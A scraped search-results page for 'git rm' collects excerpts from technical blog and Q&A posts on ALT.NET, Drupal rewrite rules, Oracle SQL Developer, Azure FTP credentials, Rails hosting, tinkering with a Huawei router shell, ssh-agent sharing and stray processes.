Search Results

Search found 3715 results on 149 pages for 'git rm'.

Page 140/149 | < Previous Page | 136 137 138 139 140 141 142 143 144 145 146 147  | Next Page >

  • St. Louis ALT.NET

    - by Brian Schroer
    I’m a huge fan of the St. Louis .NET User Group and a regular attendee of their meetings, but always wished there was a local group that discussed more advanced .NET topics. (That’s not a criticism of the group - I appreciate that they want to server developers with a broad range of skill levels). That’s why I was thrilled when Nicholas Cloud started a St. Louis ALT.NET group in 2010. Here’s the “about us” statement from the group’s web site: The ALT.NET community is a loosely coupled, highly cohesive group of like-minded individuals who believe that the best developers do not align themselves with platforms and languages, but with principles and ideas. In 2007, David Laribee created the term "ALT.NET" to explain this "alternative" view of the Microsoft development universe--a view that challenged the "Microsoft-only" approach to software development. He distilled his thoughts into four key developer characteristics which form the basis of the ALT.NET philosophy: You're the type of developer who uses what works while keeping an eye out for a better way. You reach outside the mainstream to adopt the best of any community: Open Source, Agile, Java, Ruby, etc. You're not content with the status quo. Things can always be better expressed, more elegant and simple, more mutable, higher quality, etc. You know tools are great, but they only take you so far. It's the principles and knowledge that really matter. The best tools are those that embed the knowledge and encourage the principles (e.g. Resharper.) The St. Louis ALT.NET meetup group is a place where .NET developers can learn, share, and critique approaches to software development on the .NET stack. We cater to the highest common denominator, not the lowest, and want to help all St. Louis .NET developers achieve a superior level of software craftsmanship. I don’t see a lot of ALT.NET talk in blogs these days. The movement was harmed early on by the negative attitudes of some of its early leaders, including jerk moves like the Entity Framework “vote of no confidence”, but I do see occasional mentions of local groups like the St. Louis one. I think ALT.NET has been successful at bringing some of its ideas into the .NET world, including heavily influencing ASP.NET MVC and raising the general level of software craftsmanship for developers working on the Microsoft stack. The ideas and ideals live on, they’re just not branded as “this is ALT.NET!” In the past 18 months, St. Louis ALT.NET meetups have discussed topics like: NHibernate F# and other functional languages AOP CoffeeScript “How Ruby Is Making Me a Stronger C# Developer” Using rake for builds CQRS .NET dynamic programming micro web frameworks – Nancy & Jessica Git ALT.NET doesn’t mean (to me, anyway) “alternatives to .NET”, but “alternatives for .NET”. We look at how things are done in Ruby and other languages/platforms, but always with the idea “What can I learn from this to take back to my “day job” with .NET?”. Meetings are held at 7PM on the fourth Wednesday of each month at the offices of Professional Employment Group. PEG is located at 999 Executive Parkway (Suite 100 – lower level) in Creve Coeur (South of Olive off of Mason Road - Here's a map). Food is not supplied (sorry if you’re a big fan of the Papa John’s Crust-Lovers’ Pizza that’s a staple of user group meetings), but attendees are encouraged to come early and bring/share beer, so that’s cool. Thanks to Nick for organizing, and to Professional Employment Group for lending their offices. Please visit the meetup site for more information.

    Read the article

  • Url rewrite subfolder to root and forbid accessing subfolder

    - by Alessandro Pezzato
    I have drupal installed in a subfolder drupal, but I want to access pages as it is in root folder: http://www.example.com instead of http://www.example.com/drupal I'm able to have this working, but it's also working with url containing subfolder, so I have http://www.example.com and a clone site in http://www.example.com/drupal What is the rule to forbid access to subfolder? I want all url starting with http://www.example.com/drupal being forbidden. This is .htaccess in / directory: Options -Indexes Options +FollowSymLinks <IfModule mod_rewrite.c> RewriteEngine on RewriteCond %{HTTP_HOST} ^www\.(.+)$ [NC] RewriteRule ^ http://%1%{REQUEST_URI} [L,R=301] RewriteRule ^(.*+)$ drupal/$1 [L,QSA] </IfModule> And this is drupal .htaccess in /drupal/ directory: Options -Indexes Options +FollowSymLinks ErrorDocument 404 index.php DirectoryIndex index.php index.html index.htm # Override PHP settings that cannot be changed at runtime. See # sites/default/default.settings.php and drupal_initialize_variables() in # includes/bootstrap.inc for settings that can be changed at runtime. # PHP 5, Apache 1 and 2. <IfModule mod_php5.c> php_flag magic_quotes_gpc off php_flag magic_quotes_sybase off php_flag register_globals off php_flag session.auto_start off php_value mbstring.http_input pass php_value mbstring.http_output pass php_flag mbstring.encoding_translation off </IfModule> # Requires mod_expires to be enabled. <IfModule mod_expires.c> # Enable expirations. ExpiresActive On # Cache all files for 2 weeks after access (A). ExpiresDefault A1209600 <FilesMatch \.php$> # Do not allow PHP scripts to be cached unless they explicitly send cache # headers themselves. Otherwise all scripts would have to overwrite the # headers set by mod_expires if they want another caching behavior. This may # fail if an error occurs early in the bootstrap process, and it may cause # problems if a non-Drupal PHP file is installed in a subdirectory. ExpiresActive Off </FilesMatch> </IfModule> # Various rewrite rules. <IfModule mod_rewrite.c> RewriteEngine on # Block access to "hidden" directories whose names begin with a period. This # includes directories used by version control systems such as Subversion or # Git to store control files. Files whose names begin with a period, as well # as the control files used by CVS, are protected by the FilesMatch directive # above. RewriteRule "(^|/)\." - [F] # To redirect all users to access the site WITH the 'www.' prefix, # (http://example.com/... will be redirected to http://www.example.com/...) # uncomment the following: # RewriteCond %{HTTP_HOST} !^www\. [NC] # RewriteRule ^ http://www.%{HTTP_HOST}%{REQUEST_URI} [L,R=301] # # To redirect all users to access the site WITHOUT the 'www.' prefix, # (http://www.example.com/... will be redirected to http://example.com/...) # uncomment the following: RewriteCond %{HTTP_HOST} ^www\.(.+)$ [NC] RewriteRule ^ http://%1%{REQUEST_URI} [L,R=301] RewriteBase /drupal # Pass all requests not referring directly to files in the filesystem to # index.php. Clean URLs are handled in drupal_environment_initialize(). RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_URI} !=/favicon.ico #RewriteRule ^ index.php [L] RewriteRule ^(.*)$ index.php?q=$1 [L,QSA] # Rules to correctly serve gzip compressed CSS and JS files. # Requires both mod_rewrite and mod_headers to be enabled. <IfModule mod_headers.c> # Serve gzip compressed CSS files if they exist and the client accepts gzip. RewriteCond %{HTTP:Accept-encoding} gzip RewriteCond %{REQUEST_FILENAME}\.gz -s RewriteRule ^(.*)\.css $1\.css\.gz [QSA] # Serve gzip compressed JS files if they exist and the client accepts gzip. RewriteCond %{HTTP:Accept-encoding} gzip RewriteCond %{REQUEST_FILENAME}\.gz -s RewriteRule ^(.*)\.js $1\.js\.gz [QSA] # Serve correct content types, and prevent mod_deflate double gzip. RewriteRule \.css\.gz$ - [T=text/css,E=no-gzip:1] RewriteRule \.js\.gz$ - [T=text/javascript,E=no-gzip:1] <FilesMatch "(\.js\.gz|\.css\.gz)$"> # Serve correct encoding type. Header append Content-Encoding gzip # Force proxies to cache gzipped & non-gzipped css/js files separately. Header append Vary Accept-Encoding </FilesMatch> </IfModule> </IfModule>

    Read the article

  • Welcome 2011

    - by PSteele
    About this time last year, I wrote a blog post about how January of 2010 was almost over and I hadn’t done a single blog post.  Ugh…  History repeats itself. 2010 in Review If I look back at 2010, it was a great year in terms of technology and development: Visited Redmond to attend the MVP Summit in February.  Had a great time with the MS product teams and got to connect with some really smart people. Continued my work on Visual Studio Magazine’s “C# Corner” column.  About mid-year, the column changed from an every-other-month print column to an every-other-month print column along with bi-monthly web-only articles.  Needless to say, this kept me even busier and away from my blog. Participated in another GiveCamp!  Thanks to the wonderful leadership of Michael Eaton and all of his minions, GiveCamp 2010 was another great success.  Planning for GiveCamp 2011 will be starting soon… I switched to DVCS full time.  After years of being a loyal SVN user, I got bit by the DVCS bug.  I played around with both Mercurial and Git and finally settled on Mercurial.  It’s seamless integration with Windows Explorer along with it’s wealth of plugins made me fall in love.  I can’t imagine going back and using a centralized version control system. Continued to work with the awesome group of talent at SRT Solutions.  Very proud that SRT won it’s third consecutive FastTrack award! Jumped off the BlackBerry train and enjoying the smooth ride of Android.  It was time to replace the old BlackBerry Storm so I did some research and settled on the Motorola DroidX.  I couldn’t be happier.  Android is a slick OS and the DroidX is a sweet piece of hardware.  Been dabbling in some Android development with both Eclipse and IntelliJ IDEA (I like IntelliJ IDEA a lot better!).   2011 Plans On January 1st I was pleasantly surprised to get an email from the Microsoft MVP program letting me know that I had received the MVP award again for my community work in 2010.  I’m honored and humbled to be recognized by Microsoft as well as my peers! I’ll continue to do some Android development.  I’m currently working on a simple app to get me feet wet.  It may even makes it’s way into the Android Market. I’ve got a project that could really benefit from WPF so I’ll be diving into WPF this year.  I’ve played around with WPF a bit in the past – simple demos and learning exercises – but this will give me a chance to build an entire application in WPF.  I’m looking forward to the increased freedom that a WPF UI should give me. I plan on blogging a lot more in 2011! Technorati Tags: Android,MVP,Mercurial,WPF,SRT,GiveCamp

    Read the article

  • Managing Scripts in Oracle SQL Developer

    - by thatjeffsmith
    You backup your databases, right? You backup you home computer – your media collection, tax documents, bank accounts, etc, right? You backup your handy-dandy SQL scripts, right? Ok, now that I’ve got your head nodding, I want to answer a question I get every so often: How can I manage my scripts in SQL Developer? This is an interesting question. First, it assumes that one SHOULD manage their scripts in their IDE. Now, what I think the question generally gets around to is, how can we: Navigate to our scripts Open them Execute them What a good IDE should have is an interface to your existing Version Control System (VCS.) SQL Developer supports out-of-the-box both Subversion and Git. You can also download an extension via check-for-updates to get support for CVS. Now, what I’m about to show you COULD be done without versioning and controlling your scripts – but I want to ask you why you wouldn’t want to do this? So, I’m going to proceed and assume that you do INDEED version your scripts already. Seeing what scripts you’ve already got in your repository This is very straightforward – just open the Team Versions panel. Then connect to your repository. Shows you the files in your source control system. Now, I could ‘preview’ said file right away. If I open the file from here, we get a temp file copy down from the server to the local machine. This is a local temp copy of the controlled script – I can read/execute, but not write to it. And that might be all you need. But, if your script calls other scripts, then you’re going to want to check out the server copy of your stuff down your local SVN working copy directory. That way when your script calls another script – you’re executing the PRODUCTION APPROVED copies of said scripts. And if you do SPOOL or other file I/O stuff, it will work as expected. To get to those said client copies of your scripts… Enter the Files Panel The Files panel is accessible from the View menu. You can get to your files, one of two ways. If you’ve touched the file recently, you can see it under the Recent tree. Otherwise, you can navigate to your local ‘checked out’ copies of your script(s). Open your local copies, see what’s changed, etc. And I can access the change history and see what’s been touched… What changes am I going to ‘push out’ if I commit this back to the server? Most of us work on teams, yes? This panel also gives me a heads up if someone else is making changes to the same file. I can see the ‘incoming’ changes as well. To Sum It Up… If I want to get a script to run: do a full get to your local directory open the script(s) The files panel will tell you if your local copy is out of date from the server and if you have made local changes you’ve forgotten to commit back up to the server and your fellow teammates. Now, if you’re the selfish type and don’t want to share, that’s fine. But you should still be backing up your scripts, and you can still use the Files panel to manage your scripts.

    Read the article

  • ArchBeat Link-o-Rama Top 10 for September 9-15, 2012

    - by Bob Rhubart
    The Top 10 most-viewed items shared on the OTN ArchBeat Facebook page for the week of September 9-15, 2017. 15 Lessons from 15 Years as a Software Architect | Ingo Rammer In this presentation from the GOTO Conference in Copenhagen, Ingo Rammer shares 15 tips regarding people, complexity and technology that he learned doing software architecture for 15 years. Attend OTN Architect Day – by Architects, for Architects – October 25 You won't need 3D glasses to take in these live presentations (8 sessions, two tracks) on Cloud computing, SOA, and engineered systems. And the ticket price is: Zero. Nothing. Absolutely free. Register now for Oracle Technology Network Architect Day in Los Angeles. Thursday October 25, 2012, 8:00 a.m. – 5:00 p.m. Sofitel Los Angeles , 8555 Beverly Boulevard , Los Angeles, CA 90048. Cloud API and service designers, stop thinking small | Cloud Computing - InfoWorld "The focus must shift away from fine-grained APIs that provide some type of primitive service, such as pushing data to a block of storage or perhaps making a request to a cloud-rooted database," says InfoWorld's David Linthicum. "To go beyond primitives, you must understand how these services should be used in a much larger architectural context. In other words, you need to understand how businesses will employ these services to form real workplace solutions—inside and outside the enterprise." Adding a runtime picker to a taskflow parameter in WebCenter | Yannick Ongena Oracle ACE Yannick Ongena shows how to create an Oracle WebCenter popup to allow users to "select items or do more complex things." Oracle IAM 11g R2 docs are now available "One of the great things about the new doc set is the inclusion of ePub files," says Fusion Middleware A-Team blogger Chris Johnson. "This means that if you have an iPad you can load up the doc library onto that and read the docs on the couch." Setting up a local Yum Server using the Exalogic ZFS Storage Appliance | Donald A concise technical post from the man named Donald. What's New in Oracle VM VirtualBox 4.2? | The Fat Bloke Sings "One of the trends we've seen is that as the average host platform becomes more powerful, our users are consistently running more and more vm's," says The Fat Bloke. "Some of our users have large libraries of vm's of various vintages, whilst others have groups of vm's that are run together as an assembly of the various tiers in a multi-tiered software solution, for example, a database tier, middleware tier, and front-ends." The new VirtualBox release, a year in the making, addresses the needs of these users, he explains. Configuring Oracle Business Intelligence 11g MDS XML Source Control Management with Git Version Control | Christian Screen Oracle ACE Christian Screen developed this tutorial for those interested in learning how to configure the Oracle Business Intelligence 11g (11.1.1.6) metadata repository for development using the new MDS XML source control management functionality. Identity and Access Management at Oracle Open World 2012 | Brian Eidelman Fusion Middleware A-Team blogger Brian Eideleman highlights three Oracle Openworld sessions that will put Identity and Access Management in the spotlight, and shares a link to the "Focus On: Identity Management" document, a comprehensive listing of Openworld activities also dealing with IM. Starting and stopping WebLogic automatically using Upstart | Chris Johnson "In Ubuntu, RedHat and Oracle Linux there's a new flavor of init called Upstart that all the kids are using," says Oracle Fusion Middleware A-Team member Chris Johnson. "It's the new hotness when it comes to making programs into daemons and wiring them to start and stop at appropriate times." Thought for the Day "The purpose of software engineering is to control complexity, not to create it." — Pamela Zave Source: SoftwareQuotes.com

    Read the article

  • Free and Open Source Software in Oracle Solaris 11.1

    - by user13277799
    Oracle Solaris 11.1 contains number of Free and Open Source packages. The following table contains important FOSS packages with their versions available in this latest Oracle Solaris release. a2ps 4.14 aalib 1.4.0 pmtools 20071116 apache-ant 1.7.1 httpd 2.2.22 mod_dtrace 0.3.1 mod_fcgid 2.3.6 tomcat-connectors 1.2.28 mod_perl 2.0.4 mod_proxy_html 3.1.1 modsecurity-apache 2.5.9 mod_wsgi 3.3 apr 1.3.9 apr-util 1.3.9 areca 7.1 autoconf 2.68 autogen 5.9 automake 1.10 automake 1.11.2 automake 1.9.6 bash 4.1 bcc 0.16.17 beanshell 2.0b4 db 5.1.25 bind 9.6-ESV-R7-P2 binutils 2.21.1 bison 2.3 bzip2 1.0.6 cdrtools 3.00 clisp 2.47 cmake 2.8.6 gnu 0.5.11 conflict 20100627 convmv 1.15 coreutils 8.5 cups 1.4.5 curl 7.21.2 cvs 1.12.13 diffutils 2.8.7 doxygen 1.7.6.1 ejabberd 2.1.8 elinks 0.11.7 emacs 23.4 otp_src R12B-5 fcgi 2.4.0 fetchmail 6.3.22 flex 2.5.35 foomatic-db 20080903 foomatic-db-engine 3.0-20080903 foomatic-filters 4.0.15 foomatic-filters-ppds 20080818 fping 2.4b2_to gawk 3.1.8 gcc 3.4.3 gcc 4.5.2 gd 2.0.35 gdb 6.8 gdbm 1.8.3 gettext 0.16.1 grep 2.10 ghostscript 9.00 git 1.7.9.2 gnu-gs-fonts-other 6.0 gnu-gs-fonts-std 6.0 gmp 4.3.2 gnupg 2.0.17 gnuplot 4.6.0 pth 2.0.7 gocr 0.48 gperf 3.0.3 gpgme 1.1.8 grails 1.0.3 graphviz 2.28.0 tar 1.26 guile 1.8.6 gutenprint 5.2.7 gzip 1.4 hal-cups-utils 0.6.19 hexedit 1.2.12 hplip 3.10.9 httping 1.4.4 hwdata 0.5.11 iftop 0.17 ilmbase 1.0.1 ImageMagick 6.3.4 iperf 2.0.4 ipmitool 1.8.11 ircii 20060725 dhcp 4.1-ESV-R7 junit 4.10 INIT 2011-02-08 lcms 1.19 less 436 lftp 4.3.1 libassuan 2.0.1 confuse 2.6 libedit 20110802-3.0 libee 0.3.2 libestr 0.1.2 libevent 1.4.14b expat 2.1.0 libidn 1.19 libksba 1.1.0 libmcrypt 2.5.8 libmemcached 0.16 libmng 1.0.10 neon 0.29.5 libnet 1.1.5 libpcap 1.1.1 librsync 0.9.7 libsigsegv 2.6 libsndfile 1.0.23 libtecla 1.6.1 libtool 2.4.2 libtorrent 0.12.2 libusbugen 0.1.8 libusb 0.1.8 libxml2 2.7.6 libxslt 1.1.26 lighttpd 1.4.23 links 1.03 logilab-astng 0.19.0 logilab-common 0.40.0 lua 5.1.4 m4 1.4.12 make 3.82 mc 4.7.5.2 meld 1.4.0 memcached 1.4.5 memcached-java 2.0.1 mercurial 2.2.1 mpc 0.9 mpfr 2.4.2 mutt 1.5.21 mysql 5.1.37 ncftp 3.2.3 net-snmp 5.4.1 nethack 3.4.3 nmap 5.51 ntp-dev 4.2.5 open-fabrics 1.5.3 openexr 1.6.1 openldap 2.4.30 openscap 0.8.1 openssl 0.9.8q openssl 1.0.0j libopenusb 1.0.1 p7zip 9.20.1 pam_pkcs11 0.6.0 patch 2.5.9 pconsole 1.0 pcre 8.21 perl 5.12.4 DBI 1.58 Net-SSLeay 1.36 pmtools 1.10 XML-Parser 2.36 XML-Simple 2.18 PHP 5.2.17 PHP 5.3.14 pinentry 0.7.6 privoxy 3.0.17 proftpd 1.3.3 psutils p17 pv 1.2.0 pwgen 2.06 pylint 0.18.0 CherryPy 3.1.2 coverage 3.5 jsonrpclib 0.1.3 ldtp 2.1.1 M2Crypto 0.21.1 Mako 0.4.1 nose 1.1.2 ply 3.1 pybonjour 1.1.1 pycups 1.9.46 pycurl 7.19.0 lxml 2.3.3 pyOpenSSL 0.11 Python 2.6.8 Python 2.7.3 setuptools 0.6 quagga 0.99.19 quilt 0.60 rdiff-backup 1.3.3 readline 5.2 rpm2cpio 0.5.11 rsync 3.0.8 rsyslog 6.2.0 rtorrent 0.8.2 ruby 1.8.7 samba 3.6.6 sane-backends 1.0.19 sane-frontends 1.0.14 screen 4.0.3 sed 4.2.1 sendmail 8.14.5 slang 2.2.4 slib 3b1 slrn 0.9.9 snort 2.8.4.1 sox 14.3.2 spawn-fcgi 1.6.3 squid 3.1.18 stdcxx 4.2.1 subversion 1.7.5 sudo 1.8.4.5 swig 1.3.35 expect 5.45 tcl 8.5.9 tk 8.5.9 tls 1.6 tcpdump 4.1.1 tcsh 6.17.00 texinfo 4.7 tidy 1.0.0 timezone apache-tomcat 6.0.35 top 3.8beta1 trousers 0.3.6 unixODBC 2.3.0 unrar 4.1.4 unzip 6.0 vim 7.3 visual-panels wget 1.12 which 2.16 wireshark 1.8.2 wxGTK 2.8.12 xorriso 0.6.0 xz 5.0.1 zip 3.0 zlib 1.2.3 zsh 4.3.17

    Read the article

  • Azure Web Sites FTP credentials

    - by Bertrand Le Roy
    A quick tip for all you new enthusiastic users of the amazing new Azure. I struggled for a few minutes finding this, so I thought I’d share. The Azure dashboard doesn’t seem to give easy access to your FTP credentials, and they are not the login and password you use everywhere else. What Azure does give you though is a Publish Profile that you can download: This is a plain XML file that should look something like this: <publishData> <publishProfile profileName="nameofyoursite - Web Deploy" publishMethod="MSDeploy" publishUrl="waws-prod-blu-001.publish.azurewebsites.windows.net:443" msdeploySite="nameofyoursite" userName="$NameOfYourSite" userPWD="sOmeCrYPTicL00kIngStr1nG" destinationAppUrl="http://nameofyoursite.azurewebsites.net" SQLServerDBConnectionString="" mySQLDBConnectionString="" hostingProviderForumLink="" controlPanelLink="http://windows.azure.com"> <databases/> </publishProfile> <publishProfile profileName="nameofyoursite - FTP" publishMethod="FTP" publishUrl="ftp://waws-prod-blu-001.ftp.azurewebsites.windows.net/site/wwwroot" ftpPassiveMode="True" userName="nameofyoursite\$nameofyoursite" userPWD="sOmeCrYPTicL00kIngStr1nG" destinationAppUrl="http://nameofyoursite.azurewebsites.net" SQLServerDBConnectionString="" mySQLDBConnectionString="" hostingProviderForumLink="" controlPanelLink="http://windows.azure.com"> <databases/> </publishProfile> </publishData> .csharpcode, .csharpcode pre { font-size: small; color: black; font-family: consolas, "Courier New", courier, monospace; background-color: #ffffff; /*white-space: pre;*/ } .csharpcode pre { margin: 0em; } .csharpcode .rem { color: #008000; } .csharpcode .kwrd { color: #0000ff; } .csharpcode .str { color: #006080; } .csharpcode .op { color: #0000c0; } .csharpcode .preproc { color: #cc6633; } .csharpcode .asp { background-color: #ffff00; } .csharpcode .html { color: #800000; } .csharpcode .attr { color: #ff0000; } .csharpcode .alt { background-color: #f4f4f4; width: 100%; margin: 0em; } .csharpcode .lnum { color: #606060; } I’ve highlighted the FTP server name, user name and password. This is what you need to use in Filezilla or whatever you use to access your site remotely. Notice how the password looks encrypted. Well, it’s not really encrypted in fact. This is your password in clear text. It’s just crypto-random gibberish, which is the best kind of password. UPDATE: About 2 minutes after I posted that, David Ebbo mentioned to me on Twitter that if you've configured publishing credentials (for Git typically) those will work too. Don't forget to include the full user name though, which should be of the form nameofthesite\username. The password is the one you defined. That’s it. Enjoy.

    Read the article

  • Can someone explain the true landscape of Rails vs PHP deployment, particularly within the context of Reseller-based web hosting (e.g., Hostgator)?

    - by rcd
    Currently, I have a reseller account with the company HostGator. I design websites, which up until now have occasionally been wrapped in Wordpress CMSs and the like (PHP applications). I then sell hosting (of the site I've designed) to the client, which is pretty simple, in that I can simply click a button and add a new shared hosting account/site with whatever settings I want. Furthermore, I then utilize WHMCS to automate billing and account management. It's a nice package and pretty simple. I pay something like $25 a month, and can sell a hundred accounts under this (because my clients bandwidth requirements are low). Now I am finding the need to develop more customized applications, including a minimalist CMS and several proprietary things. I soon anticipate developing these apps for clients as well. Thus, I've spent the past few months learning Rails, and it's coming along well now. The thing that has nagged at me all along, though, is the deployment issue. I can't wrap my brain around it. It seems like all of the popular options (Heroku, etc) have nice automation with git and are set up in the "Rails Way". I get that (sort of). But it's terribly expensive... a single dyno, a helper, and the cheapest database (which they say is mainly suitable for testing) that isn't limited to 5MB runs $51. This is for ONE app!!! Throw in a "production" DB and you're over $200. This is like... the same prices as getting a server somewhere, right? Meanwhile, going back to what I guess is a "traditional" hosting environment with Hostgator, their server only has Ruby 1.8.7 and Rails 2.3.5... No Rails 3. AND, no Passenger (not that I really understand the difference in CGI or mod_rails or whatever, but they say Passenger is the simplest). So I'm to understand that if I build an app in Rails 3, it won't run at all on this host? But damn, I already have these accounts under my reseller account there, all running static html and/or PHP stuff, right? So what now? How do I get all of this under one simple (and affordable) roof? Forgive my ignorance, but I just don't get it. Managing a VPS is cool and all, but entails learning server admin stuff and security... And it's expensive. I get that a shared and/or reseller "server-based" (forgive the terminology) may be inadequate for large-scale apps that use a lot of bandwidth... But what about for those of us who are building real (but small and low bandwidth) apps (with Rails) and who want to deploy them simply, cheaply, using the same conceptual approach as PHP? Even after learning all of this Ruby and Rails stuff for months, I'm questioning whether it's worth it when it comes to deployment. I want to build a small app, upload it to my home directory on a shared server account, and just make it run. Why should that be so hard? Am I just choosing the wrong language/framework? Forgive my ignorance in the subject; these questions are not rhetorical; just trying to learn here. So: 1) I'd appreciate if someone could give me a good rundown of how to understand deployment in Rails vs. PHP. 2) I'd appreciate if someone could address my issue with running a hosting/web business around reseller hosting (Hostgator) while also being able to host Rails apps. Can it be done? And how can a company like Hostgator completely ignore what's current in Rails/Ruby? Thanks.

    Read the article

  • Huawei b153 limit of devices

    - by bdecaf
    I set up my home network all through this 3G wifi router. Problem is it only allows 5 devices to connect. That's not much especially if a wifi printer and gaming consoles keep hogging these slots. On the other hand I don't see the point on blocking these devices. They are (should) not doing anything online just intern in my network. The documentation I can find is surpirisingly unhelpful and focuses how to plug the device in a power socket. So what would be my options. Notes: I have already been able to get a shell on the device using ssh. It's running some Busybox. But I fail to find the how and where this limit is enforced/created. Notes 2: Specifically my device is a 3WebCube - unfortunately not specifically marked with the Huawei Model number. Successes so far After enabling ssh in the options I can login: ssh -T [email protected] [email protected]'s password: ------------------------------- -----Welcome to ATP Cli------ ------------------------------- unfortunately because of this -T - the tab key does not work for autocomplete and all inputted commands will be echoed. Also no history with arrow keys. ATP interface this custom interface is not very useful: ATP>help help Welcome to ATP command line tool. If any question, please input "?" at the end of command. ATP>? ? cls debug help save ? exit ATP>save? save? Command failed. ATP>save ? save ? ATP>debug ? debug ? display set trace ? Shell BUT undocumented - I somehow found on a auto translated chinese website - all you need to do is input sh ATP>sh sh BusyBox vv1.9.1 (2011-03-27 11:59:11 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. # builtin commands # help Built-in commands: ------------------- . : alias bg break cd chdir command continue eval exec exit export false fg getopts hash help jobs kill let local pwd read readonly return set shift source times trap true type ulimit umask unalias unset wait shows standard unix structure: # ls / var tmp proc linuxrc init etc bin usr sbin mnt lib html dev in /bin # ls /bin zebra strace ppps ln echo cat wscd startbsp pppc klog ebtables busybox wlancmd sshd ping kill dns brctl web sntp netstat iwpriv dhcps auth usbdiagd sms mount iwcontrol dhcpc atserver upnp sleep mknod iptables date atcmd upg siproxd mkdir ipcheck cp at umount sh mini_upnpd ip console ash test_at rm mic igmpproxy cms telnetd ripd ls ethcmd cmgr swapdev ps log equipcmd cli in /sbin # ls /sbin vconfig reboot insmod ifconfig arp route poweroff init halt using tftp after installing tftp on my desktop I was able to send files with tftp -s -l curcfg.xml 192.168.1.103 and to download onto the huawei with tftp -g -r curcfg.xml 192.168.1.103 I think I'll need that - because I don't see any editor installed. readout stuff (still playing around where I would get interesting info) For confirmation of hardware: # cat /var/log/modem_hardware_name ^HWVER:"WL1B153M001"# # cat /var/log/modem_software_name 1096.11.03.02.107 # cat /var/log/product_name B153

    Read the article

  • Sharing the same `ssh-agent` among multiple login sessions

    - by intuited
    Is there a convenient way to ensure that all logins from a given user (ie me) use the same ssh-agent? I hacked out a script to make this work most of the time, but I suspected all along that there was some way to do it that I had just missed. Additionally, since that time there have been amazing advances in computing technology, like for example this website. So the goal here is that whenever I log in to the box, regardless of whether it's via SSH, or in a graphical session started from gdm/kdm/etc, or at a console: if my username does not currently have an ssh-agent running, one is started, the environment variables exported, and ssh-add called. otherwise, the existing agent's coordinates are exported in the login session's environment variables. This facility is especially valuable when the box in question is used as a relay point when sshing into a third box. In this case it avoids having to type in the private key's passphrase every time you ssh in and then want to, for example, do git push or something. The script given below does this mostly reliably, although it botched recently when X crashed and I then started another graphical session. There might have been other screwiness going on in that instance. Here's my bad-is-good script. I source this from my .bashrc. # ssh-agent-procure.bash # v0.6.4 # ensures that all shells sourcing this file in profile/rc scripts use the same ssh-agent. # copyright me, now; licensed under the DWTFYWT license. mkdir -p "$HOME/etc/ssh"; function ssh-procure-launch-agent { eval `ssh-agent -s -a ~/etc/ssh/ssh-agent-socket`; ssh-add; } if [ ! $SSH_AGENT_PID ]; then if [ -e ~/etc/ssh/ssh-agent-socket ] ; then SSH_AGENT_PID=`ps -fC ssh-agent |grep 'etc/ssh/ssh-agent-socket' |sed -r 's/^\S+\s+(\S+).*$/\1/'`; if [[ $SSH_AGENT_PID =~ [0-9]+ ]]; then # in this case the agent has already been launched and we are just attaching to it. ##++ It should check that this pid is actually active & belongs to an ssh instance export SSH_AGENT_PID; SSH_AUTH_SOCK=~/etc/ssh/ssh-agent-socket; export SSH_AUTH_SOCK; else # in this case there is no agent running, so the socket file is left over from a graceless agent termination. rm ~/etc/ssh/ssh-agent-socket; ssh-procure-launch-agent; fi; else ssh-procure-launch-agent; fi; fi; Please tell me there's a better way to do this. Also please don't nitpick the inconsistencies/gaffes ( eg putting var stuff in etc ); I wrote this a while ago and have since learned many things.

    Read the article

  • Process not Listed by PS or in /proc/

    - by Hammer Bro.
    I'm trying to figure out how to operate a rather large Java program, 'prog'. If I go to its /bin/ dir and configure its setenv.sh and prog.sh to use local directories and my current user account. Then I try to run it via "./prog.sh start". Here are all the relevant bits of prog.sh: USER=(my current account) _CMD="/opt/jdk/bin/java -server -Xmx768m -classpath "${CLASSPATH}" -jar "${DIR}/prog.jar"" case "${ACTION}" in start) nohup su ${USER} -c "exec ${_CMD} >>${_LOGFILE} 2>&1" >/dev/null & echo $! >${_PID} echo "Prog running. PID="`cat ${_PID}` ;; stop) PID=`cat ${_PID} 2>/dev/null` echo "Shutting down prog: ${PID} kill -QUIT ${PID} 2>/dev/null kill ${PID} 2>/dev/null kill -KILL ${PID} 2>/dev/null rm -f ${_PID} echo "STOPPED `date`" >>${_LOGFILE} ;; When I actually do ./prog.sh start, it starts. But I can't find it at all on the process list. Nor can I kill it manually, using the same command the shell script uses. But I can tell it's running, because if I do ./prog.sh stop, it stops (and some temporary files elsewhere clean themselves out). ./prog.sh start Prog running. PID=1234 ps eaux | grep 1234 ps eaux | grep -i prog.jar ps eaux >> pslist.txt (It's not there either by PID or any clear name I can find: prog, java or jar.) cd /proc/1234/ -bash: cd: /proc/1234/: No such file or directory kill -QUIT 1234 kill 1234 kill -KILL 1234 -bash: kill: (1234) - No such process ./prog.sh stop Shutting down prog: 1234 As far as I can tell, the process is running yet not in any way listed by the system. I can't find it in ps or /proc/, nor can I kill it. But the shell script can still stop it properly. So my question is, how can something like this happen? Is the process supremely hidden, actually unlisted, or am I just missing it in some fashion? I'm trying to figure out what makes this program tick, and I can barely prove that it's ticking! Edit: ps eu | grep prog.sh (after having restarted; so random PID) 50038 19381 0.0 0.0 4412 632 pts/3 S+ 16:09 0:00 grep prog.sh HOSTNAME=machine.server.com TERM=vt100 SHELL=/bin/bash HISTSIZE=1000 SSH_CLIENT=::[STUFF] 1754 22 CVSROOT=:[DIR] SSH_TTY=/dev/pts/3 ANT_HOME=/opt/apache-ant-1.7.1 USER=[USER] LS_COLORS=[COLORS] SSH_AUTH_SOCK=[DIR] KDEDIR=/usr MAIL=[DIR] PATH=[DIRS] INPUTRC=/etc/inputrc PWD=[PWD] JAVA_HOME=/opt/jdk1.6.0_21 LANG=en_US.UTF-8 SSH_ASKPASS=/usr/libexec/openssh/gnome-ssh-askpass M2_HOME=/opt/apache-maven-2.2.1 SHLVL=1 HOME=[~] LOGNAME=[USER] SSH_CONNECTION=::[STUFF] LESSOPEN=|/usr/bin/lesspipe.sh %s G_BROKEN_FILENAMES=1 _=/bin/grep OLDPWD=[DIR] I just realized that the stop) part of prog.sh isn't actually a guarantee that the process it claims to be stopping is running -- it just tries to kill the PID and suppresses all output then deletes the temporary file and manually inserts STOPPED into the log file. So I'm no longer so certain that the process is always running when I ps for it, although the code sample above indicates that it at least runs erratically. I'll continue looking into this undocumented behemoth when I return to work tomorrow.

    Read the article

  • Puppet gives SSL error because master is not running?

    - by Daniel Huger
